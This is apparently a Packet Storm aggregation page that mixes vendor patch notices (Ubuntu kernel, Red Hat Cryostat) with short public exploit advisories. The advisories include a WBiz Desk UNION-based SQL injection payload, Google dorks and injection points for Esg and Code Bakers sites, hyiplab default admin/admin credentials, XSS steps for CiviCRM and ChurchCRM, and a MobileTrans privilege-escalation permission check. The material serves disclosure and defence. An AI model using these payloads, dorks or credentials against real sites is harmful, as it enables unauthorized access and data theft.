WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability.

    [#] Exploit Title: WBiz Desk 1.2 - SQL Injection[#] Exploit Date: May 12, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: WBiz Desk[#] Application Version: 1.2[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: SQL@hotmail.co.uk[#] Blog: https://www.0wl.tech[#] 3xploit:[path]//ticket.php?tk=[SQL Injection][#] 3xample:[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -[#] Notes:- The vulnerability requires a non-admin privilege (normal) user to be exploited.

WBiz Desk 1.2 SQL Injection

hyiplab version 2.1 leaves a default set of administrative credentials installed post installation.

    ====================================================================================================================================| # Title     : hyiplab V2.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://appdevs.net/                                                                                               |  | # Dork      : "Every balance subtracting transactions need OTP verification so You can feel safe about your funds."              |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin[+] https://127.0.0.1/hyiplab/admin/dashboardGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

hyiplab 2.1 Default Credentials

Esg version 2.5 suffers from a remote SQL injection vulnerability.

    ===========================================================================================| # Title     : Esg 2.5 Sql Injection Vulnerability                                       || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : news.php?tayear=2023[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?tayear=2023 <==== inject here[+] Panel : /admin/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Esg 2.5 SQL Injection

Code Bakers version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Code Bakers v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.codebakers.co.uk/                                                                                      |  | # Dork      : "dishes.php?res_id="                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /dishes.php?res_id= <===== inject here [+] https://127.0.0.1/talwarabazaar.com/dishes.php?res_id=5Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Code Bakers 1.0 SQL Injection

Ubuntu Security Notice 6092-1 - Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did not properly implement speculative execution barriers in usercopy functions in certain situations. A local attacker could use this to expose sensitive information. Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel did not properly initialize some data structures. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6092-1  
May 18, 2023

linux-azure, linux-azure-4.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems

Details:

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-4.15.0-1165-azure   4.15.0-1165.180  
   linux-image-azure-lts-18.04     4.15.0.1165.133

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.15.0-1165-azure   4.15.0-1165.180~16.04.1  
   linux-image-azure               4.15.0.1165.149

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.15.0-1165-azure   4.15.0-1165.180~14.04.1  
   linux-image-azure               4.15.0.1165.131

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6092-1  
   CVE-2023-0459, CVE-2023-1118, CVE-2023-1513, CVE-2023-2162,  
   CVE-2023-32269

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1165.180

Ubuntu Security Notice USN-6092-1

CiviCRM version 5.59.alpha1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)# Date: 2023-02-02# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://civicrm.org# Software Link: https://civicrm.org/download# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)# CVE: CVE-2023-25440 / Vendor Security Advisory: CIVI-SA-2023-05Description:A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary webscripts or HTML.Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second namefield, it will be triggered once page gets loaded.Steps to reproduce:- Quick Add contact to CiviCRM,- Insert a payload PoC inside the field(s)- Click on 'Add contact'.If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.Timeline:2023-01-29: Vulnerability discovered2023-02-02: Request for CVE reservation2023-02-04: Vendor contacted2023-02-06: Vendor replies, acknowledgments and coordinating for advisory2023-02-14: Vendor discloses Security advisory and credits, internal id: CIVI-SA-2023-052023-02-15: Vendor Security Advisory publication on https://civicrm.org/advisory/civi-sa-2023-05-quick-add-widget2023-04-27: Assigned CVE number: CVE-2023-254402023-05-18: CVE publication / disclosure

CiviCRM 5.59.alpha1 Cross Site Scripting

Red Hat Security Advisory 2023-3167-01 - New Red Hat build of Cryostat 2.3.0 on RHEL 8 container images have been released, adding a variety of features and bug fixes. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat build of Cryostat 2.3.0: new RHEL 8 container images  
Advisory ID:       RHSA-2023:3167-01  
Product:           Cryostat  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3167  
Issue date:        2023-05-18  
CVE Names:         CVE-2022-41723 CVE-2022-41724 CVE-2022-41725   
                   CVE-2023-24534 CVE-2023-24536 CVE-2023-24537   
=====================================================================

1. Summary:

New Red Hat build of Cryostat 2.3.0 on RHEL 8 container images are now  
available

2. Description:

New Red Hat build of Cryostat 2.3.0 on RHEL 8 container images have been  
released, adding a variety of features and bug fixes.

Users of the Red Hat build of Cryostat 2.2.1 on RHEL 8 container images are  
advised to upgrade to these updated images, which contain backported  
patches to fix these bugs and add these enhancements. Users of these images  
are also encouraged to rebuild all container images that depend on these  
images.

You can find images updated by this advisory in Red Hat Container Catalog  
(see References).

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2178488 - CVE-2022-41725 golang: net/http, mime/multipart: denial of service from excessive resource consumption  
2178492 - CVE-2022-41724 golang: crypto/tls: large handshake records may cause panics  
2184482 - CVE-2023-24536 golang: net/http, net/textproto, mime/multipart: denial of service from excessive resource consumption  
2184483 - CVE-2023-24534 golang: net/http, net/textproto: denial of service from excessive memory allocation  
2184484 - CVE-2023-24537 golang: go/parser: Infinite loop in parsing

5. References:

https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2023-24534  
https://access.redhat.com/security/cve/CVE-2023-24536  
https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/updates/classification/#moderate  
https://catalog.redhat.com/

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGa7WNzjgjWX9erEAQj+FBAAnOGWrSlLKpNzsqaUosxtnFWSj0XhGrMf  
ajUNhtopUI4eJTEuJee/5toBKuyYGriJQ0R+CcmBd7XaZekjAEtjdC3ncglQb1Ew  
soEb9WrzoTcuVnPTJlJfY65am+zZRmc19L+S47ZYh3rr7kr50vadbFHb9IEE0p3F  
5Ikh3BAFHfQ3SIrsIiQjCGW1cS6vUB3YDpTj/k70Jya80VKDSfBq15+YUrBUlwWb  
2uXxrZ+h6Wm+njM8Sk+tGGitWI9zZiLGdnoor5iaOFZ6z7nQeUE1fC/CFH1chPat  
CXBiD3HeMfUD65EuzDwnz7VR8lNihDzJByA649z2BiJRC0OoO7UlukZLbVcqiyFU  
p1TKBqI5ysUP9CN/M68mcKojkXQj0Lsx92TnYjdol3i+3kXEetXITxRwk54o/JoZ  
UbJpq2VlIbfoGitvFBnfT2wOV/E0M9GfF/EhL6nOd53Gp1A8WRpkCzLmNnL14/yC  
MMQ8zHRolEQiUXOMxGta+H85OBrlu3JugprOBxQBtIj/awHYTVBtWW1CFn/dhA00  
qo3oH4T16bKVe7Bn8NvDDo7B5AjIu7yZJQ/kDGJH/hdULVS6qYINbFdZRePGivuK  
K8uAmcaFBu4CqTsmYNWF5EbUoPRojYmPykQ4tFLVJHncnSb5+w28Wuy7aQuBu3Zo  
1w86mzSGkvw=  
=XKpE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3167-01

ChurchCRM version 4.5.4 suffers from a cross site scripting vulnerability. Related CVE number: CVE-2023-31699.

    # Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)# Date: 2023-04-17# Exploit Author: Rahad Chowdhury# Vendor Homepage: http://churchcrm.io/# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4# Version: 4.5.4# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31699Steps to Reproduce:1. At first login your admin panel.2. Then click "Admin" menu and click "CSV Import" and you will get CSV fileuploder option.3. now insert xss payload in jpg file using exiftool or from imageproperties and then upload the jpg file.4. you will see XSS pop up.

ChurchCRM 4.5.4 Cross Site Scripting

Ubuntu Security Notice 6091-1 - It was discovered that some AMD x86-64 processors with SMT enabled could speculatively execute instructions using a return address from a sibling thread. A local attacker could possibly use this to expose sensitive information. Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6091-1  
May 18, 2023

linux-ibm, linux-oracle vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-ibm: Linux kernel for IBM cloud systems  
- linux-oracle: Linux kernel for Oracle Cloud systems

Details:

It was discovered that some AMD x86-64 processors with SMT enabled could  
speculatively execute instructions using a return address from a sibling  
thread. A local attacker could possibly use this to expose sensitive  
information. (CVE-2022-27672)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Zheng Wang discovered that the Intel i915 graphics driver in the Linux  
kernel did not properly handle certain error conditions, leading to a  
double-free. A local attacker could possibly use this to cause a denial of  
service (system crash). (CVE-2022-3707)

Haowei Yan discovered that a race condition existed in the Layer 2  
Tunneling Protocol (L2TP) implementation in the Linux kernel. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-4129)

It was discovered that the NTFS file system implementation in the Linux  
kernel contained a null pointer dereference in some situations. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-4842)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds write vulnerability. A local attacker could use this to  
cause a denial of service (system crash). (CVE-2022-48423)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2022-48424)

It was discovered that the KSMBD implementation in the Linux kernel did not  
properly validate buffer lengths, leading to a heap-based buffer overflow.  
A remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2023-0210)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Jordy Zomer and Alexandra Sandulescu discovered that syscalls invoking the  
do_prlimit() function in the Linux kernel did not properly handle  
speculative execution barriers. A local attacker could use this to expose  
sensitive information (kernel memory). (CVE-2023-0458)

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

It was discovered that the Human Interface Device (HID) support driver in  
the Linux kernel contained a type confusion vulnerability in some  
situations. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1073)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

It was discovered that the TLS subsystem in the Linux kernel contained a  
type confusion vulnerability in some situations. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-1075)

It was discovered that the Reliable Datagram Sockets (RDS) protocol  
implementation in the Linux kernel contained a type confusion vulnerability  
in some situations. An attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1078)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that the NFS implementation in the Linux kernel did not  
properly handle pending tasks in some situations. A local attacker could  
use this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2023-1652)

It was discovered that the ARM64 EFI runtime services implementation in the  
Linux kernel did not properly manage concurrency calls. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-21102)

It was discovered that a race condition existed in Adreno GPU DRM driver in  
the Linux kernel, leading to a double-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2023-21106)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

Kyle Zeng discovered that the class-based queuing discipline implementation  
in the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23454)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate the size of attributes when parsing MFT. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or expose sensitive information (kernel memory). (CVE-2023-26544)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   linux-image-5.19.0-1022-ibm     5.19.0-1022.24  
   linux-image-5.19.0-1023-oracle  5.19.0-1023.26  
   linux-image-ibm                 5.19.0.1022.19  
   linux-image-oracle              5.19.0.1023.19

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6091-1  
   CVE-2022-27672, CVE-2022-36280, CVE-2022-3707, CVE-2022-4129,  
   CVE-2022-4842, CVE-2022-48423, CVE-2022-48424, CVE-2023-0210,  
   CVE-2023-0394, CVE-2023-0458, CVE-2023-0459, CVE-2023-1073,  
   CVE-2023-1074, CVE-2023-1075, CVE-2023-1078, CVE-2023-1118,  
   CVE-2023-1513, CVE-2023-1652, CVE-2023-21102, CVE-2023-21106,  
   CVE-2023-2162, CVE-2023-23454, CVE-2023-23455, CVE-2023-26544,  
   CVE-2023-32269

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1022.24  
   https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1023.26

Ubuntu Security Notice USN-6091-1

MobileTrans version 4.0.11 suffers from having a weak service permission vulnerability.

    Vendor Name: MobileTransProduct Name: MobileTransVendor Home Page:  https://mobiletrans.wondershare.com/Affected Version(s): MobileTrans version 4.0.11Vulnerability Type: Weak Service Permissions (CWE-276)CVE Reference: CVE-2023-31748Security Researcher: Thurein SoeVulnerability description:MobileTrans is World 1 mobile-to-mobile file transferapplication.MobileTrans version 4.0.11 was being suffered a weak servicepermission vulnerability that allows a normal window user to elevate tolocal admin. The "ElevationService" service name was installed, while theMobileTrans version 4.0.11 was installed in the window option system. Theservice "ElevationService" allows the local user to elevate to the localadmin. Effectively, the local user is able to elevate to local admin.C:\Users\HninKayThayar\Desktop>sc qc ElevationService[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ElevationService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files(x86)\Wondershare\MobileTrans\ElevationService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Wondershare Driver Install Service help        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemC:\Users\HninKayThayar\Desktop>cacls "C:\Program Files(x86)\Wondershare\MobileTrans\ElevationService.exe"C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exeEveryone:(ID)F                                                                    NTAUTHORITY\SYSTEM:(ID)FBUILTIN\Administrators:(ID)FBUILTIN\Users:(ID)RAPPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)RAPPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

Source

Packet Storm